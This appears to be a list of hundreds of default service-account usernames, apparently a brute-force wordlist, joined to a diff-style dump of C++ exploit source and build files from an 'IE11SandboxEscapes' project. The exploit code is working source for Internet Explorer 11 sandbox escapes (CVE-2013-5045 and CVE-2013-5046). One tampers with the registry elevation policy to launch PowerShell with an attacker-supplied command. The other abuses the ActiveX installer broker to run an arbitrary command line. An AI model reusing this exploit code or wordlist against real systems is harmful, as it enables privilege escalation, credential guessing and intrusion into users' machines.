MGWUSER
TDOS_ICSAP
ssp
EJSADMIN
INGRES
DS
estheralastruey
VCSRV
ssladmin
CLARK
OEMADM
restoreonly
quser
MILLER
trmcnfg
REPORT
user_author
dpn
tour
mountfsys
http
PROG
openfiler
RAID
STARTER
FAXUSER
DSA
daemon
mountsys
backuponly
IVPM1
USER3
OPENSPIRIT
prime
HPLASER
CSPUSER
qsvr
SYSCKP
Sysop
user_marketer
IMAGEUSER
bsxuser
MASTER
USER9
OLAPSYS
rje
ODM_MTR
QS_ES
lansweeperuser
DEMO3
Username
GPLD
uucp
DBSNMP
VMARCH
SWUSER
Operator
CHEY_ARCHSVR
roo
n.a
accounting
backuprestore
dni
WEBADM
iceman
guru
anon
USER8
PORTAL30_SSO_PUBLIC
postgres
WINSABRE
USERP
IVPM2
PORTAL30_SSO
ALLIN1MAIL
POST
TEMP
BATCH1
PROMAIL
SECDEMO
ARAdmin
sadmin
ORAREGSYS
VMASSYS
man
FROSTY
LASER
tutor
DISKCNT
default
SYSERR
WWW
VAX
PROCAL
FAXWORKS
LDAP_Anonymous
(any
setup/snmp
DSGATEWAY
AWARD_SW
CSMIG
umountfsys
VMS
bpel
viewuser
TDISK
politically
user_analyst
RSCS
COMPIERE
OSP22
guest1
FORSE
factory
bubba
QUSER
primeos
glftpd
RMAN
mountfs
DIRECT
firstsite
IPFSERV
TSUSER
BATCH2
snmp
WebAdmin
IBMUSER
SMART
voadmin
BC4J
core
OPERVAX
Bobo
WANGTEK
OWA
USER2
jasperadmin
VMBSYSAD
PVM
ctb_admin
&nbsp;
DEMO4
qsrv
superdba
PORTAL30
XPRT
Crowd
18364
ilom-admin
rdc123
sysopr
tasman
blank
WEBREAD
ODM
11111111
AURORA$ORB$UNAUTHENTICATED
ADAMS
Craft
rfmngr
SYSTEST_CLIG
user_approver
ilom-operator
Nice-admin
answer
NETNONPRIV
nuucp
CIDS
VASTEST
redline
MBMANAGER
webmaster
APPLSYS
USER4
hqadmin
UOMNI_
VMUTIL
uucpadm
EXFSYS
4Dgifts
JMUSER
CIS
UNITY_
HLW
pwrchute
IDMSSE
NSA
TELEDEMO
recover
TRAVEL
lexar
viewer
LIBRARY
PO8
root@localhost
NAMES
secofr
PDMREMI
MGE
USER7
OWA_PUBLIC
questra
builtin
SFCNTRL
boss
PLEX
OLAPDBA
OLAPSVR
user_expert
Bhosda
gropher
TAHITI
NEWINGRES
VM3812
VIF_DEVELOPER
joeuser
IPC
HELPDESK
wlpisystem
TSAFVM
prtgadmin
UAMIS_
theman
CISINFO
mobile
QS_CB
CDEMORID
DEMO2
PORTAL30_PUBLIC
MDDEMO_CLERK
PHANTOM
ODS
BLAKE
TSDEV
PRODBM
dos
APL2PP
god1
CICSUSER
22222222
user_publisher
OSE$HTTP$ADMIN
def
SuperUser
QS_CBADM
SYSA
STUDENT
Draytek
SMDR
EREP
VSEMAN
fwadmin
MTS_USER
AQDEMO
private
IS_$hostname
HPSupport
ORASSO
CVIEW
SH
XXSESS_MGRYY
VMMAP
PORTAL30_DEMO
Ezsetup
QS_CS
CMSUSER
DEMO1
userNotUsed
ncadmin
TESTPILOT
fg_sysadmin
UETP
QS
DBI
JWARD
APPS_MRC
Moe
SENTINEL
Yak
PDP11
Flo
SLIDE
INFO
checkfsys
PRODCICS
MXAGENT
VMTLIBR
POWERCARTUSER
VMBACKUP
CPNUC
distrib
MIGRATE
CDEMOUCB
OLTSEP
sysbin
signa
autocad
WEBDB
ncrm
SAMPLE
HCPARK
ALLINONE
nm2user
SAVSYS
IIPS
PATROL
mailadmin
TMSADM
ESubscriber
software
god2
FSFTASK2
ORDSYS
gopher
PSFMAINT
EAdmin
12345
DECNET
OPERATIONS
$system
PANAMA
LIBRARIAN
fal
NETSERVER
POWERCHUTE
USER5
GPFD
QS_OS
REPADMIN
0
DEMO8
DEMO9
CDEMO82
umountsys
USER0
CDEMOCOR
SYSTEST
Rodopi
user_checker
qserv
AQ
SAPR3
VRR1
fastwire
admi
FINANCE
WinCCAdmin
ESTOREUSER
VIRUSER
LINK
APPLSYSPUB
overseer
checksys
umountfs
DBDCCICS
TOAD
ntpupdate
MDDEMO_MGR
billy-bob
DECMAIL
alien
nsroot
AdvWebadmin
dvstation
SERVICECONSUMER1
MMO2
NOC
WWWUSER
SAP
NEVIEW
ODSCOMMON
pixadmin
ripeop
PENG
netlink
L2LDEMO
OUTLN
12.x
scott
dbase
fam
Oper
RMAIL
FND
PRIV
SETUP
news
VSEIPO
ilon
PLSQL
politcally
18140815
APPUSER
CENTRA
LBACSYS
PDP8
SFCMI
lpadm
Test
bewan
DIP
mfd
MDDEMO
SWPRO
DES
Coco
GCS
rodopi
Scott
Admin5
ANDY
DESQUETOP
NETCON
JONES
author
MOESERV
PUBSUB1
CATALOG
SQLUSER
RE
REPORTS_USER
MFG
HR
VIDEOUSER
DBA
AUTOLOG1
AURORA$JIS$UTILITY$
wlcsystem
CPRM

184
external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp vendored Executable file
View File

@ -0,0 +1,184 @@
// This file is part of IE11SandboxEsacapes.
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// IE11SandboxEscapes is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
#include "stdafx.h"
#include <winternl.h>
#include <IEPMapi.h>
#define MAX_ENV 32767
#pragma comment(lib, "Iepmapi.lib")
typedef NTSTATUS (__stdcall *fNtOpenSection)(
_Out_ PHANDLE SectionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes
);
HANDLE MyCreateProcess(bstr_t exec, bstr_t cmdline)
{
STARTUPINFO startInfo = { 0 };
PROCESS_INFORMATION procInfo = { 0 };
if (!CreateProcess(exec, cmdline, NULL, NULL, FALSE, 0, NULL, NULL,
&startInfo, &procInfo))
{
DebugPrintf("Error Creating Process: %d", GetLastError());
return nullptr;
}
else
{
CloseHandle(procInfo.hThread);
return procInfo.hProcess;
}
}
bstr_t GetExploitUrl(LPWSTR env)
{
WCHAR buf[MAX_ENV];
GetEnvironmentVariable(env, buf, MAX_ENV);
return buf;
}
void CreateIEProcess()
{
HANDLE hProcess = MyCreateProcess(GetExecutableFileName(nullptr), L"iexplore.exe " + GetExploitUrl(L"HTML_URL"));
if (hProcess)
{
WaitForSingleObject(hProcess, 1000);
CloseHandle(hProcess);
}
}
void CreateUserKey(LPCWSTR path)
{
STARTUPINFO startInfo = { 0 };
PROCESS_INFORMATION procInfo = { 0 };
bstr_t sid = GetUserSid();
bstr_t linkName = L"\\Registry\\User\\" + sid + L"\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain";
LONG res = RegDeleteKey(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain");
DebugPrintf("Delete: %d", res);
bstr_t destName = L"\\Registry\\User\\" + sid + path;
CreateLink(linkName, destName, 0);
CreateIEProcess();
DeleteLink(linkName);
}
void DoRegistrySymlink()
{
STARTUPINFO startInfo = { 0 };
PROCESS_INFORMATION procInfo = { 0 };
HKEY hKey = nullptr;
HANDLE hSection = nullptr;
bstr_t sid = GetUserSid();
bool success = false;
try
{
CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights");
CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy");
CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}");
LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}",
0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
if (res != 0)
{
DebugPrintf("Open Class Key Failed %d", res);
throw 0;
}
CreateRegistryValueString(hKey, L"AppName", L"powershell.exe");
CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0");
CreateRegistryValueDword(hKey, L"Policy", 3);
bstr_t name = GetSessionPath() + L"\\BaseNamedObjects\\LRIEElevationPolicy_";
UNICODE_STRING objName = { 0 };
objName.Buffer = name;
objName.Length = SysStringByteLen(name);
objName.MaximumLength = SysStringByteLen(name);
OBJECT_ATTRIBUTES objAttr = { 0 };
InitializeObjectAttributes(&objAttr, &objName, OBJ_CASE_INSENSITIVE, 0, 0);
fNtOpenSection pfNtOpenSection = (fNtOpenSection)GetProcAddress(GetModuleHandle(L"ntdll"), "NtOpenSection");
NTSTATUS status = pfNtOpenSection(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE, &objAttr);
if (status != 0)
{
DebugPrintf("Error opening section: %08X\n", status);
throw 0;
}
unsigned int* p = (unsigned int*)MapViewOfFile(hSection, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, sizeof(unsigned int));
if (p == nullptr)
{
DebugPrintf("Error mapping section %d\n", GetLastError());
throw 0;
}
DebugPrintf("Current Counter: %d\n", *p);
// Increment
*p = *p + 1;
DebugPrintf("New Counter: %d\n", *p);
UnmapViewOfFile(p);
CloseHandle(hSection);
hSection = nullptr;
MyCreateProcess(GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0\\powershell.exe", L"powershell.exe " + GetExploitUrl(L"PSH_CMD"));
}
catch (...)
{
}
if (hSection)
{
CloseHandle(hSection);
}
if (hKey)
{
RegCloseKey(hKey);
}
}
DWORD CALLBACK ExploitThread(LPVOID hModule)
{
CoInitialize(nullptr);
DoRegistrySymlink();
CoUninitialize();
FreeLibraryAndExitThread((HMODULE)hModule, 0);
}

188
external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj vendored Executable file
View File

@ -0,0 +1,188 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>CVE20140268</RootNamespace>
<ProjectName>CVE-2013-5045</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="CVE-2013-5045.cpp" />
<ClCompile Include="dllmain.cpp">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
<Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

23
external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp vendored Executable file
View File

@ -0,0 +1,23 @@
// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
DWORD CALLBACK ExploitThread(LPVOID hModule);
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

8
external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp vendored Executable file
View File

@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// CVE-2014-0268.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

11
external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h vendored Executable file
View File

@ -0,0 +1,11 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#include <windows.h>
#include <Utils.h>

8
external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h vendored Executable file
View File

@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>

127
external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp vendored Executable file
View File

@ -0,0 +1,127 @@
// This file is part of IE11SandboxEsacapes.
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// IE11SandboxEscapes is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
#include "stdafx.h"
#include <Utils.h>
#include <Shlwapi.h>
#pragma comment(lib, "shlwapi.lib")
typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker);
void DoAXExploit()
{
try
{
HRESULT ret = E_FAIL;
IIEUserBrokerPtr broker = CreateBroker();
DebugPrintf("Created User Broker: %p\n", broker);
IIEAxInstallBrokerBrokerPtr axInstallBroker = broker;
DebugPrintf("Created AX Install Broker: %p\n", axInstallBroker);
IUnknownPtr unk;
ret = axInstallBroker->BrokerGetAxInstallBroker(__uuidof(CIEAxInstallBroker), IID_IUnknown, 0, 2, nullptr, &unk);
if (FAILED(ret))
{
DebugPrintf("Failed to create install broker\n");
throw _com_error(ret);
}
IIeAxiAdminInstallerPtr admin = unk;
bstr_t sessionGuid;
bstr_t empty;
ret = admin->InitializeAdminInstaller(empty, empty, sessionGuid.GetAddress());
if (FAILED(ret))
{
DebugPrintf("Failed initialize admin interface\n");
throw _com_error(ret);
}
DebugPrintf("Initialize: %ls\n", sessionGuid.GetBSTR());
IIeAxiInstaller2Ptr installer = unk;
DebugPrintf("Installer: %p", installer);
unsigned char* details = nullptr;
unsigned int detailsLength = 0;
CLSID mgrclsid;
// Not important really
CLSIDFromString(L"4871A87A-BFDD-4106-8153-FFDE2BAC2967", &mgrclsid);
/*bstr_t url = L"http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.8.cab#Version=2,2,4,8";
bstr_t path = L"C:\\users\\user\\desktop\\dlm-activex-2.2.4.8.cab";*/
bstr_t path = GetWindowsSystemDirectory() + L"\\notepad.exe";
bstr_t fullPath;
// Verify a local "signed" file, doesn't really matter what, we are not going to run it
ret = installer->VerifyFile(sessionGuid, nullptr, path, path, bstr_t(L""),
0, 0, mgrclsid, fullPath.GetAddress(), &detailsLength, &details);
if (FAILED(ret))
{
throw _com_error(ret);
}
WCHAR newPath[MAX_PATH];
wcscpy_s(newPath, fullPath);
PathRemoveFileSpec(newPath);
// Install file to dummy location, use canonicalization trick to escape quotes later
ret = installer->InstallFile(sessionGuid, nullptr, bstr_t(newPath), bstr_t(PathFindFileName(fullPath)),
GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp", bstr_t(L"testbin.exe"), 0);
DebugPrintf("InstallFile: %08X\n", ret);
if (FAILED(ret))
{
throw _com_error(ret);
}
bstr_t installPath = GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp\\testbin.exe";
PROCESS_INFORMATION procInfo = { 0 };
// Run our arbitrary command line
ret = installer->RegisterExeFile(sessionGuid, installPath, 0, &procInfo);
}
catch (_com_error e)
{
DebugPrintf("Error: %ls\n", e.ErrorMessage());
}
}
DWORD CALLBACK ExploitThread(LPVOID hModule)
{
CoInitialize(NULL);
DoAXExploit();
CoUninitialize();
FreeLibraryAndExitThread((HMODULE)hModule, 0);
}

182
external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj vendored Executable file
View File

@ -0,0 +1,182 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{7A9AC14A-00BC-4A69-9B86-C80635606FEA}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>CVE20140268</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
